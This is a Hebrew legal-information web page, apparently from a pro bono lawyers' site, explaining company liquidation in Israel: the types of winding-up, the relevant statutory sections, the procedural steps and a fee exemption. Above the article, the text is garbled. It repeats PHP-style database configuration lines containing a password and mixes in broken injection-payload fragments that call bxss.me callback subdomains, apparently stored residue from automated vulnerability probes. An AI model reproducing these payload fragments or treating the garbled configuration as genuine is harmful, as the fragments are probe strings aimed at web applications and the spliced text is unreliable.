$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_u $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> ?>; $db_name = "1"; ?>b_name = "1"; ?>esb9769.bxss.me.')[3].to_s)+'"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?>_pass = "g00dPa$$w0rD"; $db_name = "1"; ?>; ?>'hiteptjlxcjea2c2f9.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> פירוק חברה - עורך דין פרבונו לרשותך
x

דיווח על תקלה

תאור תקלה:
שם:
דואר אלקטרוני:
יצירת קשר
חיפוש באתר
מאמרים אחרונים

החברה שייסדת עומדת בפני סיום דרכה העסקית?

תאריך: 30/01/2011 15:07   מחבר: מערכת פרובונו

חברה הינה אישיות משפטית כשירה לקבלת חובות וזכויות.

החקיקה במדינת ישראל מכירה בקיום שלוש דרכים לסיום הקשר שבין החברה לבעליה ובין בעלי החברה לבין עצמם: פירוק בפיקוח בית משפט, פירוק על ידי בית המשפט ופירוק מרצון.

מהם הטעמים לפירוק חברה?

פירוק חברה על ידי בית המשפט יכול להתבצע מטעמים שונים, המנויים בסעיף 257 לפקודת החברות, התשמ"ג - 1983 וביניהם: הפסקת ניהול עסקים, טעמי צדק ויושר או חדלות פירעון.

פירוק חברה מרצון יכול להתבצע על ידי הנושים או על ידי בעלי המניות באמצעות האסיפה הכללית.

בהתאם לסעיף 367 לחוק החברות, התשנ"ט - 1999 התנאי לפירוק מרצון על ידי האסיפה הכללית הינו שהחברה אינה חדלת פירעון, משמע שיש ביכולתה לפרוע את חובותיה בתוך שנים עשר חודשים מתאריך ההחלטה.

לחץ כאן לקריאה מורחבת בנושאים:

אחריות נושא משרה בתאגיד

סיוע משפטי בהליך פשיטת רגל

יעוץ עורכי דין פרובונו בנושא פיצויי פיטורין

כיצד מתבצע פירוק חברה על ידי בית המשפט והמסמכים הנדרשים לשם כך

פרוצדורת הפירוק והמסמכים הנדרשים לצורך זה משתנים בהתאם לסוג הפירוק הנדרש בנסיבות המקרה הפרטני.

בפירוק על ידי בית המשפט או פירוק בפיקוח בית המשפט יש להגיש את הבקשה לבית המשפט המחוזי במקום בו נמצא הסניף הראשי של החברה.

במידה ומדובר בפירוק מרצון יש להבדיל בין מצב בו החברה חדלת פירעון לבין למצב בו החברה אינה חדלת פירעון.

לגבי חברה שאינה חדלת פירעון, שלבי ההליך הם כדלקמן:

1. שליחה של תצהיר הדירקטורים על כושר הפירעון של החברה לרשם החברות.

2. הודעה מטעם המפרק על מינויו כמפרק לחברה, אותה יש להגיש בתוך עשרים ואחד יום ממועד מינויו של המפרק.

3. שליחה של החלטת הפירוק והודעה על מינוי המפרק לפרסום ברשומות בתוך שבעה ימים.

4. המצאת דוח סופי של מפרק החברה.

5. פרסום זימון אסיפה כללית סופית ברשומות.

6. הודעה של המפרק על קיום האסיפה הסופית.

במקרה של חברה חדלת פירעון אשר מעוניינת בפירוק מרצון, חובתה של החברה ליזום פירוק באמצעות נושיה.

בנסיבות אלה סדר הפעולות כולל בין היתר גם זימון אסיפת נושים.

פטור מאגרה לחברות בהליכי פירוק מרצון

תקנות החברות (אגרות), התשס"א - 2001 קובעות פטור מאגרה עבור חברות הנמצאות בהליכי פירוק מרצון.

לצורך קבלת הפטור יש להציג את המסמכים הבאים עם הגשת הדוח הסופי בעניין פירוק החברה:

א. אישור על אי פתיחה או סגירה של תיק החברה במס הכנסה.

ב.אישור שהחברה לא נרשמה כחייבת במע"מ על פי החוק.

ג. תצהיר אי פעילות.

פירוק חברה עשוי להיות מורכב ולכן מומלץ לפנות לקבלת סיוע משפטי מטעם עורך דין.

מלאו את פרטיכם בטופס יצירת קשר באתר ופנייתכם תנותב חינם לטיפול עורך דין מומחה בתחום, אשר ילווה אתכם מראשית ההליך ועד לשלביו הסופיים.לקבלת סיוע אישי בנושא פירוק חברה, לחץ כאן:
יעוץ משפטי חינם

 

ליחצו כאן להוספת תגובה
סגורסגור